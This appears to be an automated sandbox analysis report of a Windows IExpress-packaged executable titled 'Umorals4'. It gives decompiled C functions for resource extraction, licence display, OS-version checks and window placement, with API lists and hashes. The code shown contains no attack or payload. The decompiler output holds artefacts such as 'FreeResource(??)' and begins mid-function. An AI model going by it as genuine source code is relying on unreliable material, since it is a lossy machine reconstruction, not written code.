                  									_t57 =  &(_t57[1]);
                  								} while (_t41 != 0);
                  								L18:
                  								_t62 =  &(_t62[_t50 - _t58]);
                  							}
                  						}
                  						_t63 = CharNextA(_t63);
                  					}
                  					 *_t62 = _t16;
                  				}
                  				return E00F36C20(_t16, _t43, _v8 ^ _t64, _t58, _t62, _t63);
                  			}























                  APIs
                  • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00F32966
                  • IsDBCSLeadByte.KERNEL32(00000000), ref: 00F32972
                  • CharNextA.USER32(?), ref: 00F32990
                  • CharUpperA.USER32 ref: 00F3299C
                  • CharPrevA.USER32(?,?), ref: 00F329D3
                  • CharNextA.USER32(?), ref: 00F32A52
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                  • String ID:
                  • API String ID: 571164536-0
                  • Opcode ID: 160de19b0ca61d23c26386fbdfb1ba18e53449ca7ff50703dbf3351ed7f11c2d
                  • Instruction ID: d4b47ea4436ba97c22b88a508d8ad4ae67bd6ab59056a9e91e698443e90f9727
                  • Opcode Fuzzy Hash: 160de19b0ca61d23c26386fbdfb1ba18e53449ca7ff50703dbf3351ed7f11c2d
                  • Instruction Fuzzy Hash: 184135749042899FDF75DF348C847BA7BAA9F56330F180199D8C187202DB7A8D86BB21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 86%
                  			E00F34239(struct HWND__* __ecx, struct HWND__* __edx) {
                  				signed int _v8;
                  				struct tagRECT _v24;
                  				struct tagRECT _v40;
                  				struct HWND__* _v44;
                  				intOrPtr _v48;
                  				int _v52;
                  				int _v56;
                  				intOrPtr _v60;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t29;
                  				void* _t53;
                  				intOrPtr _t56;
                  				int _t59;
                  				struct HWND__* _t63;
                  				struct HWND__* _t67;
                  				struct HWND__* _t68;
                  				struct HDC__* _t69;
                  				int _t72;
                  				signed int _t74;
                  
                  				_t63 = __edx;
                  				_t29 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t29 ^ _t74;
                  				_t68 = __edx;
                  				_v44 = __ecx;
                  				GetWindowRect(__ecx,  &_v40);
                  				_t53 = _v40.bottom - _v40.top;
                  				_v60 = _v40.right - _v40.left;
                  				GetWindowRect(_t68,  &_v24);
                  				_v48 = _v24.bottom - _v24.top;
                  				_t69 = GetDC(_v44);
                  				_v52 = GetDeviceCaps(_t69, 8);
                  				_v56 = GetDeviceCaps(_t69, 0xa);
                  				ReleaseDC(_v44, _t69);
                  				_t56 = _v60;
                  				asm("cdq");
                  				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                  				_t67 = 0;
                  				if(_t72 >= 0) {
                  					_t63 = _v52;
                  					if(_t72 + _t56 > _t63) {
                  						_t72 = _t63 - _t56;
                  					}
                  				} else {
                  					_t72 = _t67;
                  				}
                  				asm("cdq");
                  				_t59 = (_v48 - _t53 - _t63 >> 1) + _v24.top;
                  				if(_t59 >= 0) {
                  					_t63 = _v56;
                  					if(_t59 + _t53 > _t63) {
                  						_t59 = _t63 - _t53;
                  					}
                  				} else {
                  					_t59 = _t67;
                  				}
                  				return E00F36C20(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                  			}

                  APIs
                  • GetWindowRect.USER32 ref: 00F3425A
                  • GetWindowRect.USER32 ref: 00F34274
                  • GetDC.USER32(?), ref: 00F3428C
                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 00F34297
                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00F342A3
                  • ReleaseDC.USER32 ref: 00F342B0
                  • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00F3430B
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Window$CapsDeviceRect$Release
                  • String ID:
                  • API String ID: 2212493051-0
                  • Opcode ID: 5124f2053fe481dad9c1e6d72cc4942145ae56749d28c2cea773143fdd5dfa23
                  • Instruction ID: c61b12e9a758610bbabb1fa0710f9907a064b7c90b97056008ce07d7fb094904
                  • Opcode Fuzzy Hash: 5124f2053fe481dad9c1e6d72cc4942145ae56749d28c2cea773143fdd5dfa23
                  • Instruction Fuzzy Hash: 7D312D72E0021DAFCB14DFB9DD899EEBBB6EB89320F144169F805F3244D670AD059B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00F36154(intOrPtr __ecx, intOrPtr* __edx) {
                  				signed int _v8;
                  				char _v28;
                  				struct HINSTANCE__* _v32;
                  				intOrPtr _v36;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t16;
                  				struct HRSRC__* _t21;
                  				intOrPtr _t26;
                  				void* _t30;
                  				struct HINSTANCE__* _t36;
                  				intOrPtr* _t40;
                  				void* _t41;
                  				intOrPtr* _t44;
                  				intOrPtr* _t45;
                  				void* _t47;
                  				signed int _t50;
                  				struct HINSTANCE__* _t51;
                  
                  				_t44 = __edx;
                  				_t16 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t16 ^ _t50;
                  				_t46 = 0;
                  				_v36 = __ecx;
                  				_v32 = 0;
                  				_t36 = 1;
                  				E00F31524( &_v28, 0x14, "UPDFILE%lu", 0);
                  				while(1) {
                  					_t51 = _t51 + 0x10;
                  					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                  					if(_t21 == 0) {
                  						break;
                  					}
                  					_t45 = LockResource(LoadResource(_t46, _t21));
                  					if(_t45 == 0) {
                  						 *0xf39a88 = 0x80070714;
                  						_t36 = _t46;
                  					} else {
                  						_t5 = _t45 + 8; // 0x8
                  						_t44 = _t5;
                  						_t40 = _t44;
                  						_t6 = _t40 + 1; // 0x9
                  						_t47 = _t6;
                  						do {
                  							_t26 =  *_t40;
                  							_t40 = _t40 + 1;
                  						} while (_t26 != 0);
                  						_t41 = _t40 - _t47;
                  						_t46 = _t51;
                  						_t7 = _t41 + 1; // 0xa
                  						 *0xf3a290( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                  						_t30 = _v36();
                  						if(_t51 != _t51) {
                  							asm("int 0x29");
                  						}
                  						_push(_t45);
                  						if(_t30 == 0) {
                  							_t36 = 0;
                  							FreeResource(??);
                  						} else {
                  							FreeResource();
                  							_v32 = _v32 + 1;
                  							E00F31524( &_v28, 0x14, "UPDFILE%lu", _v32 + 1);
                  							_t46 = 0;
                  							continue;
                  						}
                  					}
                  					L12:
                  					return E00F36C20(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                  				}
                  				goto L12;
                  			}

                  APIs
                    • Part of subcall function 00F31524: _vsnprintf.MSVCRT ref: 00F31556
                  • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F36189
                  • LockResource.KERNEL32(00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F36190
                  • FreeResource.KERNEL32(00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F361D7
                  • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00F36201
                  • FreeResource.KERNEL32(00000000,?,00000000,00000001,00000000,?,00F3506F,00000004,00000024,00F32E01,00000000,00000001,00000000), ref: 00F36213
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Resource$Free$FindLoadLock_vsnprintf
                  • String ID: UPDFILE%lu
                  • API String ID: 2922116661-2329316264
                  • Opcode ID: b4fbe1cf495bdc621034caffab8916b36d2ffcaee8cd8869718827aa014fdf9c
                  • Instruction ID: fd9356959c0fcf155fe6c7a3239ded36aba582461a04603c482b93c9ba9a010a
                  • Opcode Fuzzy Hash: b4fbe1cf495bdc621034caffab8916b36d2ffcaee8cd8869718827aa014fdf9c
                  • Instruction Fuzzy Hash: 8B21E476A00219ABDB14AF65DC499BFBB79FF44734F004119E942E3201CB358C02ABA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00F3671D(void* __ebx, signed int* __edx) {
                  				signed int _v8;
                  				char _v20;
                  				struct _OSVERSIONINFOA _v168;
                  				int* _v172;
                  				void* _v176;
                  				int _v180;
                  				int _v184;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t19;
                  				intOrPtr _t21;
                  				long _t31;
                  				signed int _t35;
                  				void* _t36;
                  				intOrPtr _t41;
                  				signed int _t44;
                  
                  				_t40 = __edx;
                  				_t36 = __ebx;
                  				_t19 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t19 ^ _t44;
                  				_t41 =  *0xf38200; // 0xfffffffe
                  				_t43 = 0;
                  				_v180 = 0xc;
                  				_v172 = 0;
                  				if(_t41 != 0xfffffffe) {
                  					L14:
                  					_t21 = _t41;
                  				} else {
                  					 *0xf38200 = 0;
                  					_v168.dwOSVersionInfoSize = 0x94;
                  					if(GetVersionExA( &_v168) == 0) {
                  						L13:
                  						_t41 =  *0xf38200; // 0xfffffffe
                  						goto L14;
                  					} else {
                  						_t41 = 1;
                  						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v176) != 0) {
                  							goto L13;
                  						} else {
                  							_t31 = RegQueryValueExA(_v176, 0xf31111, 0,  &_v184,  &_v20,  &_v180);
                  							_t43 = _t31;
                  							RegCloseKey(_v176);
                  							if(_t31 == 0) {
                  								_t40 =  &_v172;
                  								if(E00F365E5( &_v20,  &_v172) == 0) {
                  									goto L13;
                  								} else {
                  									_t35 = _v172 & 0x000003ff;
                  									if(_t35 == 1 || _t35 == 0xd) {
                  										 *0xf38200 = _t41;
                  									} else {
                  										goto L13;
                  									}
                  								}
                  								goto L14;
                  							} else {
                  								_t21 =  *0xf38200; // 0xfffffffe
                  							}
                  						}
                  					}
                  				}
                  				return E00F36C20(_t21, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                  			}

                  APIs
                  • GetVersionExA.KERNEL32(?,00000000,?), ref: 00F3676C
                  • GetSystemMetrics.USER32 ref: 00F367A5
                  • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00F367CA
                  • RegQueryValueExA.ADVAPI32(?,00F31111,00000000,?,?,0000000C), ref: 00F367F2
                  • RegCloseKey.ADVAPI32(?), ref: 00F36800
                  Strings
                  • Control Panel\Desktop\ResourceLocale, xrefs: 00F367C0
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: CloseMetricsOpenQuerySystemValueVersion
                  • String ID: Control Panel\Desktop\ResourceLocale
                  • API String ID: 3077698598-1109908249
                  • Opcode ID: 67b6f43f9e44934d9150721b5615a8d2b17870167fa38ff463b563bf55201974
                  • Instruction ID: df781fbd9f800e1b49f3af3339ccc1fd332c619d33e3b03c2fffa3732a3c7e06
                  • Opcode Fuzzy Hash: 67b6f43f9e44934d9150721b5615a8d2b17870167fa38ff463b563bf55201974
                  • Instruction Fuzzy Hash: 6B318D75E00218EFEB218B11DC04BAAB7B9FF49370F1481A5E948D2150DB309A45EB92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00F33884() {
                  				void* _t3;
                  				void* _t9;
                  				CHAR* _t16;
                  
                  				_t16 = "LICENSE";
                  				_t1 = E00F34538(_t16, 0, 0) + 1; // 0x1
                  				_t3 = LocalAlloc(0x40, _t1);
                  				 *0xf39044 = _t3;
                  				if(_t3 != 0) {
                  					_t19 = _t16;
                  					if(E00F34538(_t16, _t3, _t28) != 0) {
                  						if(lstrcmpA( *0xf39044, "<None>") == 0) {
                  							LocalFree( *0xf39044);
                  							L9:
                  							 *0xf39a88 = 0;
                  							return 1;
                  						}
                  						_t9 = E00F363E1(_t19, 0x7d1, 0, E00F32FA0, 0, 0);
                  						LocalFree( *0xf39044);
                  						if(_t9 != 0) {
                  							goto L9;
                  						}
                  						 *0xf39a88 = 0x800704c7;
                  						L2:
                  						return 0;
                  					}
                  					E00F34327(0, 0x4b1, 0, 0, 0x10, 0);
                  					LocalFree( *0xf39044);
                  					 *0xf39a88 = 0x80070714;
                  					goto L2;
                  				}
                  				E00F34327(0, 0x4b5, 0, 0, 0x10, 0);
                  				 *0xf39a88 = E00F3613C();
                  				goto L2;
                  			}

                  APIs
                    • Part of subcall function 00F34538: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F34549
                    • Part of subcall function 00F34538: SizeofResource.KERNEL32(00000000,00000000,?,00F32BA8,0000007F,?,?,?,?,?,?,00000000,00000001,00000000), ref: 00F34552
                  • LocalAlloc.KERNEL32(00000040,00000001,00000000,00000000,00000001,00000000,00F32DF8,00000000,00000001,00000000), ref: 00F338A2
                  • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00F338F8
                    • Part of subcall function 00F34327: LoadStringA.USER32 ref: 00F3438D
                    • Part of subcall function 00F34327: MessageBoxA.USER32 ref: 00F343C9
                    • Part of subcall function 00F3613C: GetLastError.KERNEL32(00F35A9A), ref: 00F3613C
                  • lstrcmpA.KERNEL32(<None>,00000000), ref: 00F33915
                  • LocalFree.KERNEL32 ref: 00F33958
                    • Part of subcall function 00F363E1: FindResourceA.KERNEL32(00F30000,000007D6,00000005), ref: 00F363F4
                    • Part of subcall function 00F363E1: LoadResource.KERNEL32(00F30000,00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000), ref: 00F36402
                    • Part of subcall function 00F363E1: DialogBoxIndirectParamA.USER32 ref: 00F36421
                    • Part of subcall function 00F363E1: FreeResource.KERNEL32(00000000,?,?,00F32D76,00000000,00F31800,00000547,0000083E,?,?,?,?,?,?,00000000,00000001), ref: 00F3642A
                  • LocalFree.KERNEL32(00000000,00F32FA0,00000000,00000000), ref: 00F33939
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: Resource$FreeLocal$FindLoad$AllocDialogErrorIndirectLastMessageParamSizeofStringlstrcmp
                  • String ID: <None>$LICENSE
                  • API String ID: 660532738-383193767
                  • Opcode ID: c2ca5c5165e4cb2b825b59b663efdf31120c84acd8162f03187263c8f357c700
                  • Instruction ID: edff11c28c5d22f8b8932bfe1f84cb2386185d633c526536021a64273d6bddd9
                  • Opcode Fuzzy Hash: c2ca5c5165e4cb2b825b59b663efdf31120c84acd8162f03187263c8f357c700
                  • Instruction Fuzzy Hash: 25119671708209ABD7249B36AC09F177ABBEBC5731F10403DB546D2261DAFDD801BA21
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 61%
                  			E00F36F15(void* __ebx, void* _a4, int _a8, void* _a12, int _a16) {
                  				void* __edi;
                  				void* __esi;
                  				void* _t7;
                  				void* _t8;
                  				void _t9;
                  				void* _t15;
                  				void* _t17;
                  				void* _t18;
                  				int _t19;
                  				void _t20;
                  				void _t21;
                  
                  				_t19 = _a16;
                  				if(_t19 != 0) {
                  					_t7 = _a4;
                  					if(_t7 != 0) {
                  						_push(__ebx);
                  						_t15 = _a12;
                  						if(_t15 == 0 || _a8 < _t19) {
                  							_t8 = memset(_t7, 0, _a8);
                  							if(_t15 != 0) {
                  								if(_a8 >= _t19) {
                  									_t9 = 0x16;
                  									goto L13;
                  								}
                  								L00F36E44();
                  								_push(0x22);
                  								L11:
                  								_pop(_t20);
                  								_push(0);
                  								_push(0);
                  								_push(0);
                  								_push(0);
                  								_push(0);
                  								 *_t8 = _t20;
                  								L00F36E4F(_t15, _t17, _t18, _t20, 0);
                  								_t9 = _t20;
                  								goto L13;
                  							}
                  							L00F36E44();
                  							_push(0x16);
                  							goto L11;
                  						} else {
                  							memcpy(_t7, _t15, _t19);
                  							_t9 = 0;
                  							L13:
                  							L14:
                  							return _t9;
                  						}
                  					}
                  					L00F36E44();
                  					_t21 = 0x16;
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					 *_t7 = _t21;
                  					L00F36E4F(__ebx, _t17, _t18, _t21, 0);
                  					_t9 = _t21;
                  					goto L14;
                  				}
                  				return 0;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: _errno
                  • String ID: Umorals4
                  • API String ID: 2918714741-264535404
                  • Opcode ID: 2968453ca2872e87b862ff43ad89350036689a3a2ec3368cd9c8daba3631ed0c
                  • Instruction ID: b24d803e9bc11da3ce34bb943956cfe5bb323e89371716e7ed5c74961d5fe8dd
                  • Opcode Fuzzy Hash: 2968453ca2872e87b862ff43ad89350036689a3a2ec3368cd9c8daba3631ed0c
                  • Instruction Fuzzy Hash: 4901C077B04206BADE22AAB6EC42A6B375CDF94774F11C025F909CB101F575C810BAB1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E00F3233C(void* __ebx) {
                  				signed int _v8;
                  				char _v268;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t7;
                  				void* _t20;
                  				long _t26;
                  				signed int _t27;
                  
                  				_t20 = __ebx;
                  				_t7 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t7 ^ _t27;
                  				_t25 = 0x104;
                  				_t26 = 0;
                  				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                  					E00F364E7( &_v268, 0x104, "wininit.ini");
                  					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                  					_t25 = _lopen( &_v268, 0x40);
                  					if(_t25 != 0xffffffff) {
                  						_t26 = _llseek(_t25, 0, 2);
                  						_lclose(_t25);
                  					}
                  				}
                  				return E00F36C20(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                  			}

                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00F32362
                  • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00F32388
                  • _lopen.KERNEL32 ref: 00F32397
                  • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00F323A8
                  • _lclose.KERNEL32(00000000), ref: 00F323B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.511219365.0000000000F30000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.511243497.0000000000F38000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.511254163.0000000000F3A000.00000002.00020000.sdmp
                  Similarity
                  • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                  • String ID: wininit.ini
                  • API String ID: 3273605193-4206010578
                  • Opcode ID: bc893f648c7fbb9125e7327b31a41383423785fb4e812e69a6168b8c60c2e7bd
                  • Instruction ID: 932a46b94a6389ab37fafb29df6af3cca959c0b297d3c3fa527bc46e1a5ea264
                  • Opcode Fuzzy Hash: bc893f648c7fbb9125e7327b31a41383423785fb4e812e69a6168b8c60c2e7bd
                  • Instruction Fuzzy Hash: E1017572A0011C6BC720AB66DC0DDEF7B6DEB55770F000155FD85D3290DE788D45DAA1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 76%
                  			E00F33587(signed char __ecx) {
                  				signed int _v8;
                  				char _v268;
                  				struct _OSVERSIONINFOA _v416;
                  				signed int _v420;
                  				signed int _v424;
                  				signed int _v428;
                  				void* _v432;
                  				CHAR* _v436;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t66;
                  				CHAR* _t71;
                  				short _t72;
                  				CHAR* _t79;
                  				CHAR* _t82;
                  				signed int _t83;
                  				int _t86;
                  				CHAR* _t87;
                  				signed char _t88;
                  				void* _t92;
                  				CHAR* _t94;
                  				signed short _t97;
                  				signed int _t99;
                  				signed char _t101;
                  				CHAR* _t110;
                  				CHAR* _t111;
                  				intOrPtr* _t116;
                  				signed int _t118;
                  				signed int _t119;
                  				void* _t122;
                  				CHAR* _t124;
                  				int _t127;
                  				signed int _t128;
                  
                  				_t66 =  *0xf38000; // 0xfdaca2c3
                  				_v8 = _t66 ^ _t128;
                  				_v416.dwOSVersionInfoSize = 0x94;
                  				_t101 = __ecx;
                  				_t124 = 0;
                  				_v432 = __ecx;
                  				_t127 = 0;
                  				if(GetVersionExA( &_v416) != 0) {
                  					_t123 = _v416.dwMajorVersion;
                  					_t71 = _v416.dwPlatformId - 1;
                  					__eflags = _t71;
                  					if(_t71 == 0) {
                  						_t72 = 0;
                  						__eflags = 1;
                  						 *0xf381f8 = 1;
                  						 *0xf381c4 = 1;
                  						L14:
                  						 *0xf39a80 = _t72;
                  						L15:
                  						__eflags =  *0xf38954 - _t127; // 0x0
                  						if(__eflags != 0) {
                  							goto L61;
                  						}
                  						__eflags = _t101;
                  						if(_t101 == 0) {
                  							goto L61;
                  						}
                  						__eflags = _t72;
                  						if(_t72 != 0) {
                  							_t101 = _t101 + 4;
                  							__eflags = _t101;
                  						} else {
                  							_t101 = _t101 + 0x40;
                  						}
                  						_v436 = _t101;
                  						_v420 = _t124;
                  						do {
                  							_t123 = _v416.dwMinorVersion;
                  							_t76 = _t124 * 0x18;
                  							_v424 = _t124 * 0x18;
                  							_v428 = E00F328FA(_t124 * 0x18, _v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t76 + _t101)),  *((intOrPtr*)(_t76 + _t101 + 4)));
                  							_t79 = E00F328FA(_v424, _v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t101 + 0xc)),  *((intOrPtr*)(_v424 + _t101 + 0x10)));
                  							_t110 = _v428;
                  							__eflags = _t110;
                  							if(_t110 < 0) {
                  								L36:
                  								__eflags = _t124 - 1;
                  								if(_t124 == 1) {
                  									L33:
                  									_t127 = 0x54c;
                  									L34:
                  									_v420 = _v420 & 0x00000000;
                  									_t101 = 0;
                  									_v428 = _v428 & 0x00000000;
                  									_t123 = _v432;
                  									__eflags = _t127 - 0x54d;
                  									if(_t127 != 0x54d) {
                  										_t111 = _v436;
                  									} else {
                  										_t111 =  *((intOrPtr*)(_t123 + 0x80)) + 0x84 + _t124 * 0x3c + _t123;
                  										_v420 =  &_v268;
                  									}
                  									__eflags = _t111;
                  									if(_t111 == 0) {
                  										_t124 = _v428;
                  									} else {
                  										_t88 = _t111[0x30];
                  										_t124 = _t111[0x34] + 0x84 + _t123;
                  										__eflags = _t88 & 0x00000001;
                  										if((_t88 & 0x00000001) == 0) {
                  											asm("sbb ebx, ebx");
                  											_t101 =  ~(_t88 & 2) & 0x00000101;
                  										} else {
                  											_t101 = 0x104;
                  										}
                  									}
                  									__eflags =  *0xf38958 & 0x00000001;
                  									if(( *0xf38958 & 0x00000001) != 0) {
                  										L59:
                  										_push(0);
                  										_push(0x30);
                  										_push(_v420);
                  										_push("Umorals4");
                  										goto L60;
                  									} else {
                  										__eflags =  *_t124;
                  										if( *_t124 == 0) {
                  											goto L59;
                  										}
                  										MessageBeep(0);
                  										_t82 = E00F3671D(_t101, _t123);
                  										__eflags = _t82;
                  										if(_t82 == 0) {
                  											L52:
                  											_t83 = 0;
                  											__eflags = 0;
                  											L53:
                  											_t86 = MessageBoxA(0, _t124, "Umorals4", _t83 | _t101 | 0x00000030);
                  											__eflags = _t101 & 0x00000004;
                  											if((_t101 & 0x00000004) == 0) {
                  												__eflags = _t101 & 0x00000001;
                  												if((_t101 & 0x00000001) == 0) {
                  													goto L61;
                  												}
                  												__eflags = _t86 - 1;
                  												L57:
                  												if(__eflags == 0) {
                  													_t127 = 0;
                  												}
                  												goto L61;
                  											}
                  											__eflags = _t86 - 6;
                  											goto L57;
                  										}
                  										_t87 = E00F366C2(_t111, _t111);
                  										__eflags = _t87;
                  										if(_t87 == 0) {
                  											goto L52;
                  										}
                  										_t83 = 0x180000;
                  										goto L53;
                  									}
                  								}
                  								goto L37;
                  							}
                  							__eflags = _t79;
                  							if(_t79 > 0) {
                  								goto L36;
                  							}
                  							__eflags = _t110;
                  							if(_t110 != 0) {
                  								__eflags = _t79;
                  								if(_t79 != 0) {
                  									break;
                  								}
                  								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t101 + 0x14));
                  								L31:
                  								if(__eflags <= 0) {
                  									break;
                  								}
                  								L32:
                  								__eflags = _t124;
                  								if(_t124 == 0) {
                  									goto L37;
                  								}
                  								goto L33;
                  							}
                  							__eflags = _t79;
                  							_t97 = _v416.dwBuildNumber;
                  							if(_t79 != 0) {
                  								_t118 = _v424;
                  								__eflags = (_t97 & 0x0000ffff) -  *((intOrPtr*)(_t118 + _t101 + 8));
                  								if((_t97 & 0x0000ffff) >=  *((intOrPtr*)(_t118 + _t101 + 8))) {
                  									break;
                  								}
                  								goto L32;
                  							}
                  							_t119 = _t97 & 0x0000ffff;
                  							_t99 = _v424;
                  							__eflags = _t119 -  *((intOrPtr*)(_t99 + _t101 + 8));
                  							if(_t119 <  *((intOrPtr*)(_t99 + _t101 + 8))) {
                  								goto L32;
                  							}
                  							__eflags = _t119 -  *((intOrPtr*)(_t99 + _t101 + 0x14));
                  							goto L31;
                  							L37:
                  							_t124 =  &(_t124[1]);
                  							_t92 = 2;
                  							_v420 = _t124;
                  							__eflags = _t124 - _t92;
                  						} while (_t124 < _t92);
                  						_t116 = _v432;
                  						__eflags =  *((intOrPtr*)(_t116 + 0x7c)) - _t127;
                  						if( *((intOrPtr*)(_t116 + 0x7c)) == _t127) {
                  							goto L61;
                  						}
                  						_t123 =  &_v268;
                  						_t94 = E00F32755(_t116,  &_v268, _t116,  &_v420);
                  						__eflags = _t94;
                  						if(_t94 != 0) {
                  							goto L61;
                  						}
                  						_t124 = _v420;
                  						_t127 = 0x54d;
                  						goto L34;
                  					}
                  					__eflags = _t71 == 1;
                  					if(_t71 == 1) {
                  						 *0xf381f8 = 1;
                  						 *0xf381c4 = 1;
                  						_t72 = 2;
                  						 *0xf39a80 = _t72;
                  						__eflags = _t123 - 3;
                  						if(_t123 > 3) {
                  							__eflags = _t123 - 5;
                  							if(_t123 < 5) {
                  								goto L15;
                  							}
                  							_t72 = 3;
                  							goto L14;
                  						}
                  						_t72 = 1;
                  						_t122 = 3;
                  						 *0xf39a80 = 1;
                  						__eflags = _t123 - _t122;
                  						if(__eflags < 0) {
                  							L10:
                  							 *0xf381f8 = _t124;
                  							 *0xf381c4 = _t124;
                  							goto L15;
                  						}
                  						if(__eflags != 0) {
                  							goto L15;
                  						}
                  						__eflags = _v416.dwMinorVersion - 0x33;
                  						if(_v416.dwMinorVersion >= 0x33) {
                  							goto L15;
                  						}
                  						goto L10;
                  					}
                  					_t127 = 0x4ca;
                  					goto L5;
                  				} else {
                  					_t127 = 0x4b4;
                  					L5:
                  					_push(_t124);
                  					_push(0x10);
                  					_push(_t124);
                  					_push(_t124);
                  					L60:
                  					_t123 = _t127;
                  					E00F34327(0, _t127);
                  					L61:
                  					return E00F36C20(0 | _t127 == 0x00000000, _t101, _v8 ^ _t128, _t123, _t124, _t127);
                  				}
                  			}

                  APIs
                  • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00F335BC
                  • MessageBeep.USER32(00000000), ref: 00F33801
                  • MessageBoxA.USER32 ref: 00F33831
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.511228963.0000000000F31000.00000020.00020000.sdmp, Offset: 00F30000, based on PE: true
